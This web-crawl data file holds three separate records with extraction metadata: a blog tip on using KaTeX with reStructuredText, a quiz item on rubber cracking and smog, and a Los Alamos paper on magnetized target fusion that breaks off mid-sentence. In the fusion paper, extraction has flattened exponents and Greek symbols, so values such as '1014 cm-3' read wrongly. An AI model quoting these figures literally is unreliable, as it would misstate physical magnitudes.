{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.42677634954452515, "perplexity": 2119.0322351862355}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-27/segments/1435375097512.42/warc/CC-MAIN-20150627031817-00160-ip-10-179-60-89.ec2.internal.warc.gz"}
https://weiler.rocks/using-katex-in-hugo-with-restructuredtext/
# Using Katex with Restructured Text Published: 06.01.2020 | 216 Words | 2 minutes Tags: [ katex restructuredtext latex ] ## Problem: But on posts that are using the .rst format the rendering was broken. For example the Latex equation "\forall x,y \in \mathbb{N}" should be rendered as $$\forall x,y \in \mathbb{N}$$ but instead there was $$forall x, y in mathbb{N}$$ The issue can be found in the processing of the .rst file. Because "\" is the escape-character in Restructured Text all "\" are stripped off from the html-output. ## Solution: You could just escape the "\" with another "\" so that the equation will look like this "\\forall x,y \\in \\mathbb{N}". This might work for small formulas but it's not perfect. Because now we have to type much more "\". The more convenient solution is to use a Directive named "raw". With ".. raw:: html"" the Restructured Text-Parser will bypass a section of the content so that Katex can do the rendering. It can be utilized like this: Some content above. .. raw:: html $$\forall x,y \in \mathbb{N}$$ Normal content below the ignored section. The blank lines around .. raw:: html are important as it is the indetation!
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7854017615318298, "perplexity": 7022.175461483903}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710417.25/warc/CC-MAIN-20221127173917-20221127203917-00365.warc.gz"}
http://clay6.com/qa/24338/cracking-of-rubber-is-due-to
Browse Questions Cracking of rubber is due to $\begin{array}{1 1}(a)\;Smog\\(b)\;Acid\;rain\\(c)\;Green\;house\;effect\\(d)\;High\;temperature\end{array}$ Cracking of rubber is due to smog Hence (a) is the correct answer.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9912134408950806, "perplexity": 4122.938193670156}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280872.69/warc/CC-MAIN-20170116095120-00453-ip-10-171-10-70.ec2.internal.warc.gz"}
https://fusionenergy.lanl.gov/Documents/MTF/Why_MTF/Why-MTF-Comments.html
Why Magnetized Target Fusion Offers A Low-Cost Development Path for Fusion Energy Richard E. Siemon Irvin R. Lindemuth Kurt F. Schoenberg Los Alamos National Laboratory Los Alamos, New Mexico Submitted to Comments on Plasma Physics and Controlled Fusion, November 12, 1997 I. Introduction Reasonably priced energy supplies have become an expectation of the developed world and a necessary ingredient for development of Third World countries. The problem of providing large supplies of low-cost energy is a long-term, complex one that requires sustained R&D efforts, in spite of the shadow cast on long-term R&D by the federal deficit problem. The role of fusion energy as a power source was thoroughly reviewed and strongly endorsed in 1995 by the President’s Committee of Advisors on Science and Technology Fusion Review Panel chaired by John Holdren. He argued [Holdren 95]: The options available for meeting the world’s demand for energy in 2050 and beyond are those already in use – fossil fuels, biomass energy, nuclear fission, hydropower, geothermal energy, wind energy, and solar energy – plus, potentially, nuclear fusion. In these circumstances, it should be obvious that there is great merit in the pursuit of diversity in energy options for the next century. There are not so many possibilities altogether. The greater the number of these that can be brought to the point of commercialization, the greater will be the chance that overall energy needs can be met without encountering excessive costs from or unmanageable burdens upon any one source. In the past decade the critical issue for fusion has shifted from one of scientific feasibility to one of commercial viability. The specific problem is that all fusion technologies currently being pursued involve extremely costly facilities for the required steps of further development. In the present international fiscal environment, it is imperative to find a more cost effective development path for fusion energy. The conventional regime of Magnetic Fusion Energy (MFE), with plasma density n ~ 1014 cm-3 and magnetic field provided by superconducting magnets, has been relatively well explored [Sheffield 96]. Tokamaks are the major devices studied in MFE, and tokamak research has tremendously advanced our understanding of plasma physics. The International Tokamak Experimental Reactor (ITER) design illustrates the technology and cost for an ignited plasma demonstration in the MFE regime. The estimated \$10-billion price for ITER calls into question whether fusion can ever be developed based on tokamak-like technology. Factors of a few, or maybe ten at most, in any parameter such as size, neutron wall loading, and so forth are about all that one can credibly seek in optimizing a tokamak system. Certainly research seeking to reduce the ITER-like system size by factors of a few is extremely important and needs to be pursued. But we strongly suspect that the necessary breakthrough, which would allow fusion to be developed in a more timely and affordable manner, will involve a qualitatively different and significant departure from the MFE tokamak regime and technology. Another approach to fusion, Inertial Confinement Fusion (ICF), represents a good alternative to MFE in that the regime of density and pressure is completely different, the physics issues are quite distinct, and the technology required has fairly little in common with a tokamak-like system [Lindl 95]. Thus, the issues that are likely to emerge as limitations for one approach are unlikely to apply to the other. Unfortunately, the cost of developing ICF is also high. The price of the National Ignition Facility (NIF), which will demonstrate ICF ignition, is over \$1 billion. The anticipated cost of developing efficient inertial fusion drivers such as heavy ion beams is also high [Bangerter 97]. For the development of fusion energy, something less expensive would obviously be desirable. A Lower Cost Alternative—Magnetized Target Fusion To find a lower cost approach, we start by noting that the cost of development is directly linked to the system size, which in the case of MFE is mostly dictated by the maximum magnetic field strength obtainable with superconducting magnets. The critical constraint with ICF is the costly high-power drivers needed to achieve the extreme conditions of density and pressure. We also note that countless examples can be found in the magnetic fusion literature showing that fusion reactions can be created in smaller-sized systems if one admits larger magnetic field, higher plasma density, and pulsed operation as with imploding liners [Sherwood 81, Lindemuth 83, Robson 76, Vekshtein 90, Ryutov 96, Gross 76]. In this paper we will review the basic reason for that tendency, and examine some of the consequences. We will conclude that the most interesting regime of density is n ~1020 cm-3, which is high compared with MFE, but low compared with ICF. This density regime at 10 keV temperature corresponds to megabars of pressure (millions of atmospheres), which is intrinsically pulsed in nature. We define the intermediate density regime to be Magnetized Target Fusion (MTF). The name is chosen based on two general characteristics that we assume for MTF: 1) as with ICF, PdV work heats the fuel by compressing it inside an imploding wall, or "pusher" in the parlance of ICF, and 2) magnetic field is embedded in the fuel to insulate it from the pusher. Although numerous variations in approach can be envisioned, we have in mind the magnetically-driven imploding liner method for MTF. In the liner approach: • fuel with an embedded magnetic field would be preheated and positioned inside a volume of centimeter dimensions, which is surrounded by a thin metal shell (or liner) that will act as the pusher, • a current introduced on the outer surface of the liner would cause it to implode by self-pinching magnetic forces at a velocity of approximately 106 cm/sec, • the liner would be made thick enough that the pinching current does not vaporize it, and therefore the liner would be a flux-conserving metal shell during the implosion, • at peak compression a significant fraction of the liner kinetic energy would be converted to thermal energy of the fuel, and • the dwell time of the liner at peak compression and the final fuel density and temperature would be designed to give significant fusion energy generation. The liner velocity required is termed hypervelocity because the kinetic energy density exceeds the heat of vaporization for liner materials. The technology for precision implosions creating millions of atmospheres of pressure is a challenge in its own right. In the 1970s when a number of MTF-related efforts were underway, most of the effort was directed towards developing this demanding technology, and very few integrated tests with a preheated plasma were ever done. In what must be viewed as a serendipitous coincidence, the Department of Energy's Office of Defense Programs (DP) in the last decade has significantly advanced the technology of imploding liners with the same parameters of implosion velocity and kinetic energy as those needed for investigating fusion reactions in the MTF regime. The purpose of the Defense Program work is to study and understand hydrodynamics in the megabar pressure regime and has no connection with nuclear fusion. However, the existence of DP expertise and facilities offers an important near term advantage for resuming MTF research. The magnetic field to insulate fuel from its surroundings is the essential ingredient of MTF. In fact, the benefit of a magnetic field in a fusion target was recognized in the 40’s by Fermi at Los Alamos and at approximately the same time by Sakharov in the former Soviet Union. We will derive below the advantages in terms of reduced energy and power that must be delivered to the fusion fuel. The advantages of MTF can also be expressed in terms of requirements on driver technology. By preheating MTF fuel to between 100 and 500 eV, the volume compression needed to reach 10 keV temperature is 100-1000. The volume compression ratios for ICF are typically 30,000 to 60,000, which requires a much more precise implosion system. The characteristic implosion velocity for MTF is 0.3-3.0 cm per microsecond, which is 10 to 100 times smaller than for ICF. The peak pressure for MTF is 1-10 megabars, and for ICF, 100s of gigabars. These impressive differences justify careful examination of ways to introduce a magnetic field. II. The Technical Case for Magnetized Target Fusion A. Lawson Condition for Pulse Duration and Energy Confinement Time In a pulsed system, as opposed to steady-state, the pulse duration, t burn, is an important new variable. The pulse duration determines the amount of fuel that reacts or "burns," given the reaction cross section, leading to an nt burn requirement in a similar way that nt E is determined from power balance in a steady-state system. For deuterium (DT) fuel the thermonuclear reaction rate per unit volume is R = nDnT <s DT v> = 1/4 n2 <s DT v> (1) where nD=nT is the deuterium and tritium density, n =nD+nT is the total ion or electron density, and <s DT v> is the averaged product of cross section and relative velocity for a Maxwellian velocity distribution. At 10 keV, <s DT v> @ 10-16 cm3/sec. The total density decreases at the rate 2R as the fuel is consumed, and the frequency of fusion reactions per ion for either deuterium or tritium ions is given by 2R/n: (dnD/dt)/nD = (dn/dt)/n = ½ n <s DT v> (2) Assuming for simplicity that DT fuel is held at constant temperature so that <s DT v> is constant in time while it burns, Eqn. 2 can be integrated to give n/n0 = 1/(1+ n0t burn <s DT v>/2) (3) where t burn is the burn time. Equation 3 can be recast in terms of f, the fractional burnup of fuel, as: f /(1-f) = n0t burn <s DT v>/2 (4) where f º 1-n/n0. For complete burnup, the gain would be Gmax= 300 at 10 keV. This is simply the ratio of energy for a 14.1 MeV neutron and 3.5 MeV alpha divided by the 60 keV of thermal energy for a DT ion pair with electrons. Figure 1. Fusion energy output relative to plasma energy vs. the product of density and burn time. As a function of burn time, the gain plotted in Fig. 1 is Gmax times the fractional burnup. We can define a Lawson condition using Fig. 1. With nt burn ~ 3x1014 cm-3 sec the gain relative to thermal energy is around five, enough to allow for net gain with realistic efficiencies. The net gain relative to initially stored electrical energy is the gain of Fig. 1 times the efficiency of heating fuel to 10 keV temperature. For example, if 50% of the stored electrical energy is converted to liner kinetic energy [Gerwin 78], and 50% of the liner kinetic energy is converted to thermal plasma energy at peak compression, then the net gain would be 1/4 of the gain plotted in Fig. 1. A plasma heated to 10 keV will cool by numerous mechanisms. The total power losses per unit volume are conventionally written as 3nT/t E, where t E is the global energy confinement time. In deriving Fig. 1 we ignored losses, which is equivalent to assuming t E>>t burn. To obtain the minimum possible system size for the purpose of low–cost development, we would require t E ~ t burn . That is, if t E were much less than t burn the fuel would cool before it burned. On the other hand if t E were much larger than t burn , the plasma should be made smaller to equalize the two, which requires less energy, assuming the energy confinement time increases with system size. For approximate estimates, the relevant energy confinement time and the burn time should both satisfy a Lawson-like nt , which we will take for the purposes of demonstrating feasibility to be the same as ITER, and approximately an energy breakeven condition according to Figure 1: Lawson requirement: nt ~ nt E ~ nt burn ~ 3x1014 cm-3 sec This nt E corresponds to 1.5% burnup fraction in a pulsed system. B. Pressure of High-Density Fuel Dictates Pulsed Technology The first requirement for containing fuel is equilibrium or pressure balance to prevent the fuel from expanding during the required burn time. There are a continuum of possibilities ranging from ICF with zero magnetic field where pressure is supported by the inertia of surrounding low-temperature fuel, to full magnetic confinement where plasma pressure is less than or equal to the confining magnetic pressure. In the MTF regime we consider the possibility where plasma pressure is larger than or equal to the magnetic field pressure, because the main role of magnetic field is insulation and not confinement. Broadly speaking, the relevant technology changes as the density increases. We assume Ti ~ Te ~ 10 keV. At densities from 1014 cm-3 up to about 1016 cm-3 plasma pressure can be contained by superconducting magnets, where the higher density corresponds to magnetic confinement with b = 1. Plasma b º 2nkT/(B2/8p ), where B is the magnetic field. At pressure or density too high for superconductors, pulsed magnets can be used up to pressures that fracture known materials. Strength limitations set an upper limit on the density at about 1018 cm-3. This density corresponds to magnetic field of about 1 MG if magnetic pressure confines the plasma. To date, the largest magnetic fields reported are pulsed fields of about 20 MG, which can be obtained by imploding liners [Pavlovskii 96]. If 20 MG were used for plasma confinement, the corresponding maximum density is around 1021 cm-3. Above that density, plasma pressure must be held by the inertia of material walls, although magnetic field can be utilized for its insulating properties. For ICF the density of the ignited hot spot is expected to be about 1025 cm-3, which corresponds to a pressure of 200 Gbar. We see that the technology for fusion changes radically as one moves from MFE density to ICF density. C. Fusion Fuel Diffuses Before Burning Another basic point useful to recall for the following discussion is that s DT, the cross section for fusion, is much smaller than s C, the cross section for Coulomb scattering, almost independent of density. By definition the frequency of collisions is given by the product of cross section and flux. The rate of fusion reactions is given by the right–hand side of Eqn. 3: Frequency of fusion reactions = ½ n <s DT v> (5) The effective fusion cross section can be taken as <s DT v>/vi, ~ 1 barn (10-24 cm2) at 10 keV where vi is the ion thermal speed. Similarly the Coulomb collision frequency can be written as a product of the Coulomb cross section and particle flux, n multiplied by vi: Ion-ion Coulomb collision frequency = n ii = 1/ t ii = n vis C (6) Thus at 10 keV and 1014 cm-3 s C ~ 7000 barns. This Coulomb collision frequency, or reciprocal of the ion-ion collision time, is extensively discussed in the standard textbooks. Because of the accumulated effects of small-angle scattering, the frequency of Coulomb collisions is proportional to lnL , a factor that depends weakly upon temperature and density. The Coulomb logarithm is often taken as a constant about equal to 20, but even for rough estimates we will calculate lnL when it arises, because the range of density we will consider (1014–1026 cm-3) corresponds to lnL changing by more than a factor of 3. At a temperature of 10 keV, the cross section or frequency for Coulomb scattering is larger than the cross section or frequency of fusion reactions by a factor of 2000-6000 for density between 1026 cm-3 and 1014 cm-3 respectively. Therefore, the number of collisions (N) that occur during a burn time is calculated to be: N = t burn / t ii = 2 f vis C / <s DT v> (7) For nt E = 3x1014 cm-3 sec, the burn time is between 60 and 180 ion-ion collision times as density varies from 1026 cm-3 to 1014 cm-3. In summary, we conclude that, independent of the fuel density over a wide range of density, collisional diffusive processes are unavoidable when fusion fuel is assembled for a time long enough to produce energy gain. D. The Nature of Energy Diffusion Even if fuel is held in pressure balance for the necessary burn time, it has been historically difficult to achieve the required global energy confinement time. Much of MFE fusion research has been devoted to understanding the many modes of plasma motion that transport energy in addition to classical collisional processes. With ICF, there is less uncertainty about loss processes, because the absence of a magnetic field simplifies the transport physics. In that case electron thermal conduction is the dominant loss process. In the ICF approach parameters are chosen so that even electron thermal conduction is consistent with the Lawson condition. One could say that ICF is the "worst case" for thermal losses when compared with any type of magnetic configuration. Classical diffusion. We review now the lower bound on energy confinement represented by classical diffusion. In MFE fusion literature, the global energy confinement time is usually expressed in terms of thermal diffusivity: t E ~ a2/c , (8) where a is the characteristic dimension across which heat diffuses and c is the thermal diffusivity. The value of c (same as thermal conductivity divided by density) is derived by calculating the energy flux in the presence of a temperature gradient. Thermal diffusion can also be viewed as a random walk of particles. After each collision, a particle moves one step at random either up or down the temperature gradient. Heat conduction is the diffusion of cold particles up the gradient and hot particles down the gradient with no net flux of particles. The essential feature of the random walk is that after N collisions, there is a binomial distribution for particle location, and it has a width proportional to N1/2. If the step size is l , then the standard deviation of the distribution of particle locations after N collisions is a given by a = N1/2 l . (9) If the collision time is t , the number of collisions is N = t / t , so we can also write Eqn. 9 as t = (a/l )2 t (10) Eqn. 9 indicates that if N collisions are needed before heat dissipates, then the fuel must have a characteristic size greater than a. Equivalently, Eqn. 10 gives the time to dissipate heat (energy confinement time) in terms of the number of steps across the characteristic size, (a/l ), and the time per step or collision time. Classical diffusion without a magnetic field. To apply the random-walk argument to electron thermal conduction, we equate the step size to a plasma mean free path l . Electrons have a larger thermal speed and a shorter collision time, such that the mean free path l is the same for either ions or electrons: l = 1 / ns C = vi t ii = ve t ee (11) where vi,e is the ion, or electron, thermal speed. Electrons collide more frequently by a factor of (mi/me)1/2 , or about 60 for a DT mixture. Therefore, if we consider high density where ions make about 60 collisions, then electrons make about 3600 collisions during the fusion burn time. The size of a plasma with burn time long enough to allow 3600 electron-electron collisions is a = (3600)1/2 l . (12) For ICF, where the ignition hot spot density is about 1025 cm-3, the mean free path is 0.7 microns; this simple estimate of Eqn. 12 for hot spot radius is 42 microns. More detailed calculations [Lindl 95] give about the same value. Classical diffusion with a magnetic field. To apply the random-walk argument to magnetized plasma is more difficult, because the step size depends upon complicated particle orbits in the magnetic field. However, for poloidal-field dominated configurations like the Reversed Field Pinch, the spheromak, and the Field-Reversed Configuration (FRC), and for tokamaks, detailed studies give the simple prescription that the step size can be taken as the ion gyro radius calculated in the poloidal magnetic field [Boozer 83]. (In a torus the toroidal direction is the long way around the torus, and the poloidal direction is the short way around.) In the direction perpendicular to a magnetic field, the classical ion heat conduction dominates because the ions have a larger gyro radius. Therefore, we can estimate that the minimum required size of a fusion system to diffuse heat slowly enough to meet Lawson, say 180 ion-ion collision times, is a = (180)1/2 ri, (13) where ri is the ion gyro radius in the poloidal magnetic field. The tokamak banana-regime formulas for neoclassical transport theory give about 20 ri instead of the approximate estimate of 13 ri given by Eqn. 13. Because of anomalous transport, the design radius of ITER is about 5 times larger than the neoclassical limit (i.e. aiter @ 100 ri). E. Characteristic Step Sizes Decrease as Density Increases Comparing Eqns. 8 and 10, we see that c has the form of a step size squared times a collision frequency. For classical transport, Electron thermal conduction: c e ~ l 2n ee. (14) Ion cross field transport: c i ~ ri 2n ii. (15) The mean free path (l ), which depends on temperature and density, is plotted in Fig. 2 for 10 keV temperature. The gyro radius (ri), which depends mainly on density, is also plotted in Fig. 2, assuming constant poloidal beta (b i), where b i is the ratio of ion pressure to poloidal field pressure (b i = 8p nkTi/Bp2). The density dependence can be seen by writing the gyro radius as: ri = vi/w ci = (c/w pi)b i1/2 (16) where w ci is the ion cyclotron frequency in the poloidal magnetic field, c is the speed of light, and w pi is the ion plasma frequency, w pi = (4p ne2/mi)1/2 (cgs units). (17) Poloidal beta in tokamaks and the above mentioned configurations is observed not to differ much from unity. In the spirit of a survey of minimum system size for fusion, Fig. 2 gives useful guidance. The dimensions of a system without magnetic insulation become unacceptably large at low density. The classical limit for the size of a magnetized plasma is seen to be quite small as density increases. If the anomaly factor assumed in the ITER design, and observed with tokamaks having density in the vicinity of 1014 cm-3, were to apply at higher density, then Lawson should be possible at 1020 cm-3 in a tokamak with a minor radius of 2.8 mm! This dramatic reduction in size at higher density provides much of the motivation for MTF. Figure 2. Plots of characteristic step sizes and poloidal magnetic field strength assuming poloidal beta = 1 vs. fuel density for a plasma with 10 keV temperature. Speculation on anomalous transport. Anomalous transport mechanisms are still a subject of unfinished research. Clearly, all possibilities cannot be anticipated, but the following can be noted. Generally the form of c is a product of characteristic lengths times a frequency. The characteristic lengths in a plasma normally identified are l , l D, c/w pi, c/w pe, ri, and re. As already noted, c/w pi and ri are only different by a factor of order unity, and therefore the gyro radius in Fig. 2 is also approximately the same as c/w pi. The gyro radius re (and thus c/w pe) is smaller than the gyro radius ri by a factor of (mi/me)1/2. The Debeye length l D has the same density dependence as the electron gyro radius. Therefore the variation of all the usual characteristic lengths with density is correctly inferred from Fig. 2, and a reasonable conjecture is that the tendency towards smaller size at higher density is true for anomalous transport as well as for classical transport. III. Plasma Energy Reduced at High Density To quantify the variation of diffusion step sizes with density in terms that come closer to economic value, we show in Fig. 3 the thermal energy contained by a plasma with characteristic dimension of a. Three different configurations are included in Fig. 3: ICF-relevant unmagnetized fuel, tokamaks, and a generic MTF plasma taken to be a compact torus (CT). We assume that when density is varied for a given configuration, size is adjusted to be the minimum necessary to provide nt E = 3x1014 cm-3 sec at 10 keV temperature. Specific assumptions for each configuration are summarized in the table following Fig. 3. A. ICF Energy Requirements For ICF we see a very strong dependence of energy upon density, and thus the importance of compressing to high density. By compressing to density of approximately 1025 cm-3, the energy in the hot spot according to Fig. 3 is approximately 30 kJ, which is similar to the value anticipated in the design of NIF [Lindl 95]. Achieving such a high density requires an implosion velocity of about 30-40 cm per microsecond and a radial convergence of between 30 and 40. The NIF laser design, with 1.8 MJ and 500 TW, has enough energy and power to produce these conditions even with the inefficiency of indirect drive. However, if the hot-spot density were to be reduced, the energy requirements would be considerably increased as shown in Fig. 3, and the power requirements would also be increased to achieve the same nt E. Thus, the ICF approach utilizes very high density to achieve fusion with minimum energy, but the driver requirements are extremely demanding and expensive. B. Tokamak Energy Requirements Tokamaks are included in Fig. 3 for academic interest, even though high-density operation of a tokamak-like configuration is not being considered. The poloidal magnetic field required at any given density is plotted in Fig. 2. For the assumed value of safety factor (q) and aspect ratio, the toroidal field required would be approximately a factor of ten higher than the poloidal field. Thus, the magnetic energy would be 100 times as large as the plasma thermal energy plotted in Fig. 2. The cost of a tokamak is well known to be strongly tied to the cost of the magnets. The important aspect of the tokamak is that much more is known about transport than for any other configuration. A useful summary of tokamak transport formulas can be found in the textbook by Kadomtsev [Kadomtsev 92]. We plot both the classical limit for confinement (neoclassical in the banana, transition, and Pfirsch-Schluter regimes as density increases) and some empirically based models for anomalous transport. The anomalous transport curves show the anticipated tendency that system size becomes small at increasing density. One concludes from these plots that if the technology were available to operate tokamaks at higher density, the size and cost could be reduced. C. MTF Energy Requirements. For MTF compression by a liner, there are many possible magnetic configurations. To make estimates for Fig. 3, we have chosen a compact toroid (CT) plasma as generic for any magnetic configuration. Specifically the CT curves in Fig. 3 are calculated assuming the plasma is an FRC, which has ideally only poloidal magnetic field [Tuszewski 88]. Similar values apply to a spheromak. In that case a toroidal field comparable in magnitude to the poloidal field of the FRC would be required [Jarboe 94]. CTs require more energy than a tokamak at a given density because CTs need more volume to achieve the same effective radius or insulating distance. A prolate FRC, as is commonly studied in experiments, has an effective radius equal to the distance from the field null to the outer edge, which is approximately 0.3 of the small radius of the prolate spheroid. Thus the FRC estimate for energy may be conservatively high in Fig. 3, although modeling of wall-plasma interactions tend to show spatial profiles that resemble an FRC-like profile (Siemon 97). Figure 3. Energy requirements vs. fuel density for various configurations and transport assumptions assuming nt E = 3x1014 cm-3 sec, T = 10 keV, and poloidal b = 1. Configuration Transport Comments ICF Electron thermal conduction Spherical plasma with size given by Eqn. 12. Density of ~1025 cm-3 corresponds to NIF. Tokamak Neoclassical, anomalous neo-Alcator, and anomalous ITER-89P Aspect ratio (2.9), poloidal beta (1.0), and safety factor q (3.0) are held constant at ITER-like values. Compact Torus (CT) Classical or Bohm Geometry of a prolate FRC assumed for illustration with length to diameter ratio of 3. The amount of energy required for fusion conditions depends upon the global energy confinement time. Fig. 3 indicates that compressed plasma energy between about 30 kJ and 10 MJ is required in the MTF regime (density of 1020 cm-3), if plasma transport is between classical and Bohm. For the larger Bohm requirement of 10 MJ, the required liner kinetic energy would be tens of MJs, a few times the final plasma energy. One striking difference between the MFE and MTF regimes of density is that Bohm is an acceptable possibility at MTF density, while as shown in Fig. 3, Bohm is totally unacceptable at 1014 cm-3. The curve labeled Bohm deserves additional comment. In the early days of fusion research Bohm was introduced as an empirical diffusivity [Spitzer 62] equivalent to the following: c BOHM = c i (w cit ii)/16, (18) where w cit ii = l /ri is the magnetization parameter. The factor of 16 has no theoretical basis. It is interesting to note that apart from the factor of 16, c BOHM is the geometric mean or logarithmic average of c i and c e given in Eqns. 14 and 15. Thus Bohm can be thought of as intermediate between classical magnetized and unmagnetized confinement. Kadomtsev describes how there are situations where macroscopic convection can lead to energy transport with a global Bohm confinement time [Kadomtsev 92]. Studies of wall-confined MTF-type plasma by Vekshtein show how classical confinement can lead to a Bohm-like scaling [Vekshtein 90]. Even more interesting is that experimental data from a number of carefully studied magnetic configurations, including Reversed Field Pinches, spheromaks, and FRCs, is generally as good as Bohm or better. Global energy confinement time can be worse than Bohm when other non-diffusive processes dominate. Examples are radiation because of impurities, or plasma flow out of the system at a speed comparable to the thermal speed. Radiation by impurities is always a concern and places an upper limit on the allowed impurity concentration. Plasma flow cannot be ruled out in general, but the conjecture here is that target plasma configurations can be found for which a pressure equilibrium exists between the metal liner boundary and the fuel, and thus flow is reduced to nothing worse than convective motions. Close proximity of a conducting boundary should provide a stabilizing influence on magneto-hydrodynamic modes, especially since magnetic fields do not penetrate a conducting boundary on the short time scale of interest for MTF. Spheromaks and FRCs are two examples of CTs for which there are data to support this conjecture. We conclude Bohm represents a reasonable, even conservative, expectation for achievable global energy confinement based on previous experimental results, assuming impurities can be avoided by careful experimental technique. IV. The Size and Cost of Ignition Facilities Only a rough connection can be made between cost and plasma energy plotted in Fig. 3. For each of the configurations, however, one would expect that the indicated reduction of energy as density increases would result in a reduction of costs for the required facility to create the ignition-grade plasma. Even an approximate connection is adequate for present purposes, given the many decades of system size plotted in Fig. 3. Note that the left-hand scale varies by 12 orders of magnitude. We list in Table 1 costs for recently designed ignition-class facilities in each of the regimes of MFE, ICF, and MTF. In the case of MTF we base the cost for an ignition facility upon the ATLAS pulsed-power facility, recently designed and under construction by Defense Programs at Los Alamos [Trainor 97]. ATLAS should be able to deliver 5-10 MJ to an imploding liner, which makes it suitable for a considerable range of possible MTF experiments. Although the primary mission of ATLAS is not MTF, a reasonable number of additional experiments to test MTF are consistent with current plans for the facility. For the purpose of estimating MTF ignition-grade facility costs, we assume that 1) the 35-MJ of stored energy in ATLAS is enough to implode a liner-plasma configuration to ignition (see Fig. 3), and 2) the additional cost for the plasma target preparation is small compared with the \$50-million cost of the ATLAS facility. The purpose of Table I is to compare facility costs needed for a fusion energy development program. The fact that ATLAS is being built for other reasons is simply a fortunate circumstance. The research effort expended to date on MTF has been minuscule compared with the other two approaches to fusion, and so the cost of achieving ignition conditions is obviously much less certain. However, the advantage appears so large that the accuracy of the estimate is not very important. Table 1. Approximate Cost of Ignition Facilities Concept Plasma Thermal Energy Facility Cost MFE/ITER 1 GJ \$10 billion ICF/NIF 30 kJ \$1 billion MTF/ATLAS ~ 10 MJ ~\$50 million V. Near Term Prospects for MTF Research A. Typical MTF Parameters The main points of this paper, which are contained in Fig. 3 and Table 1, argue for starting a new thrust in fusion energy research. In this section we discuss some aspects of how to begin that effort. Our concept for a liner-driven plasma implosion suggests approximate values for initial and final plasma parameters as given in Table 2. Table 2. Representative Conditions for an Adiabatic Implosion Parameter Desired Final Conditions Required Initial Plasma if Kv=100 Required Initial Plasma if Kv=1000 Temperature 10 keV 460 eV 100 eV Density 1020 cm-3 1018 cm-3 1017 cm-3 B Field 10 MG 100 kG 100 kG Liner inner radius 5 mm 5 cm 5 cm To illustrate the required initial target-plasma conditions, we assume adiabatic compression (pVg =const) with a volumetric compression Kv = 100 or 1000, corresponding to cylindrical, or spherical, radial compression of 10 respectively. The adiabatic approximation is justified according to time-dependent calculations taking thermal and radiation losses into account [Lindemuth 83], and the parameter space for MTF is found to be quite large, assuming an implosion velocity on the order of 106 cm/sec. B. Target Plasma Possibilities. Among the many possible magnetic configurations that would be possible for the target plasma, the ones currently receiving attention in our awareness are: 1) the MAGO-type of accelerated diffuse-z-pinch plasma [Lindemuth, 96], 2) an expanded high-density-fiber z pinch inside a conducting boundary [Wysocki 97], and 3) compact toroids [Ryutov 96]. An approach that uses energy from a high-power e-beam driver to form a magnetized plasma has also been reported [Chang 78]. Extensive research on compact toroids, the spheromak and Field-Reversed Configuration, began in about 1980. The review articles by Tuszewski and Jarboe have hundreds of references [Tuszewski 88, and Jarboe 94]. By definition, a CT is a self-contained magnetized plasma that can be moved from one spatial location to another. Thus, CTs are an obvious candidate for inserting a plasma target into an imploding metal liner. Unfortunately, most fusion-related liner research ended about the same time that CT work began, so most of the information gained from CT research was not available to the early liner researchers. A few experiments studying the implosion of an FRC-type of CT were done in Russia [Kurtmullaev 82]. Most CT research was done at much lower density than is needed for MTF. The RACE experiments at LLNL are a notable exception [Hammer 91]. There is no obvious problem in forming CTs at higher density, and experiments to move in that direction would be desirable. The MAGO and expanded fiber z pinch are diffuse z-pinch magnetic configurations. The outstanding attraction of these approaches is that the technology for plasma formation is reasonably compatible with liner implosion technology, and is less complicated than for CTs. For MAGO at least, plasma density and temperature appear suitable for proceeding with MTF implosion experiments [Lindemuth 95]. More refined measurements are still needed to characterize global energy confinement in both the MAGO and expanded fiber plasmas. The diffuse z pinch has well known limitations with regard to stability, and containment of energetic particle orbits. However, simulations show [Sheehey 89] that an unstable plasma inside a conducting boundary can evolve to a stable state (known as a Kadomtsev-stable profile). In such a state, the energy confinement may be adequate on the time scale of an MTF implosion. The fact that most alpha particles 